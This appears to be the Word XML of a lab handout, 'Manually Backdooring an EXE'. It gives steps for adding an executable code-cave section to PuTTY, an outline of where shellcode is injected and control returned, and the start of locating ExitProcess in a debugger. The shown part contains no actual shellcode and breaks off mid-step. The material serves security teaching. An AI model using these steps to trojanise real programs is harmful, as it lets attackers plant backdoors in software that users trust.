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1CE35" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_9wcceq4tdnd" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Manually Backdooring an EXE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7010B65F" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Disclaimer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>: this is for educational purposes only, please do not use it for malicious or illegal activity. This might get you into serious trouble without the consent of the target (victim).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3142A9" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3"/>
    <w:p w14:paraId="18D739D2" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>You will be required to submit a full walk-through of your work, either as a document or recorded video (both are fine).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D1DA66" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_ticip6y5qks9" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Steps to Create the Code Cave:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B43BDD" w14:textId="137181FF" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1155CC"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Putty</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in CFF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4169920F" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A151E32" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Go to section headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67342859" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56FCC369" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Add Section (Empty Space) → 1000 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E16E42" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="184FAF06" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Name section → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.Beef</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FA32E0" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="707E8FF7" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Change Section Flags → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Is Executable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Is readable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Is writeable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4265F9B5" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D295BB6" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="0A6CA566" wp14:editId="0511FB3F">
            <wp:extent cx="5943600" cy="18923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1892300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B02F7C" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="001A5DC6" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Save As → Putty2.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8C317A" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3352BFCF" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Try to open Putty2.exe → Does it work?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089529AC" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D6C5D63" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Now load the new EXE into Immunity Debugger to continue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214777C2" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3"/>
    <w:p w14:paraId="4DCA0A51" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_vs1d0pdxa98c" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>High level view of how the manual injected code will look like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFAB225" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a"/>
        <w:tblW w:w="3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tblGrid>
      <w:tr w:rsidR="004C25E3" w14:paraId="013D09B7" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3495" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5E9124C9" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>PUSHAD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C25E3" w14:paraId="2DD8B234" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3495" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1DAA6B07" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>PUSHFD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C25E3" w14:paraId="482E38F5" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3495" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6D393EE1" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>…</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C25E3" w14:paraId="6C66EA2C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3495" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="304BF0F0" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>SHELLCODE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C25E3" w14:paraId="03CB5DCC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3495" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="433282A9" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>…</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C25E3" w14:paraId="66DBC8C2" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3495" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2BDA0AC4" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ALIGN the STACK</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C25E3" w14:paraId="7242BA30" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3495" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="18B1A63A" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>…</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C25E3" w14:paraId="2C8649A5" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3495" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="04EDA958" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>POPFD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C25E3" w14:paraId="1A3436A3" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3495" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="36C40D04" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>POPAD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C25E3" w14:paraId="6268C7AC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3495" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6020B912" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>…</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C25E3" w14:paraId="4C52BDD9" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3495" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="68C0ED0B" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>REPLACED CODE HERE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C25E3" w14:paraId="3F0EE0E3" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3495" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1D4A1B88" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>JUMP BACK</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="38D62BF2" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3"/>
    <w:p w14:paraId="0B60C7B2" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3"/>
    <w:p w14:paraId="1AD9B6E8" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4AA173" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_tkn5p6pzvnmy" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Finding the Exit Point of the Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232070FA" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>In the code pane, right click and go to “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Search for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” then “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Name (label) in current module</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9AE324" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Search for “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ExitProcess</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07089806" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="1DE0546A" wp14:editId="421326A6">
            <wp:extent cx="3981450" cy="21812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81450" cy="2181225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBCDDA4" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Right click and select “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Set breakpoint on every reference</w:t>
      </w:r>
      <w:r>
